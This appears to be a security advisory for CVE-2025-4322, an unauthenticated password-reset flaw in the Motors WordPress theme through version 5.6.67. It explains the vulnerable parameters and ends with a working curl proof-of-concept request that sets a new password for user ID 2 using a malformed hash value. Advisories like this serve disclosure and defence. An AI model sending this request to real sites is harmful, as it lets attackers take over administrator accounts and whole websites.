
CVE-2025-4322 – Unauthenticated Privilege Escalation via Password Update "Account Takeover" 🔥
The Motors theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.6.67. This is due to the theme not properly validating a user's identity prior to updating their password. This makes it possible for unauthenticated attackers to change arbitrary user passwords, including those of administrators, and leverage that to gain access to their account.
CNA: Wordfence Base Score: 9.8 ⚫ CRITICAL Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
5.6.67 - Unauthenticated Privilege Escalation via Password Update/Account Takeover5.6.67The Motors WordPress theme (up to and including version 5.6.67) contains a critical authentication flaw in its password reset functionality.
It provides a front-end password update mechanism via endpoints, but fails to properly validate user identity or authorization before processi+ ng password changes.
As a result, unauthenticated attackers can send crafted HTTP requests that supply a user_id, an arbitrary hash_check, and a new password (stm_new_password) to reset any user’s password — including administrators.
If exploited, this allows attackers to:
Gain administrative access,
Take over the entire site,
Deploy persistent backdoors or malicious plugins.
curl "https://local.ization/loginregister/?user_id=2&hash_check=%C0" --data "stm_new_password=randomizer" -XPOST -v -H 'User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Mobile Safari/537.36'
This report is for educational and authorized security testing purposes only. Exploitation of this vulnerability without permission may violate legal and ethical boundaries.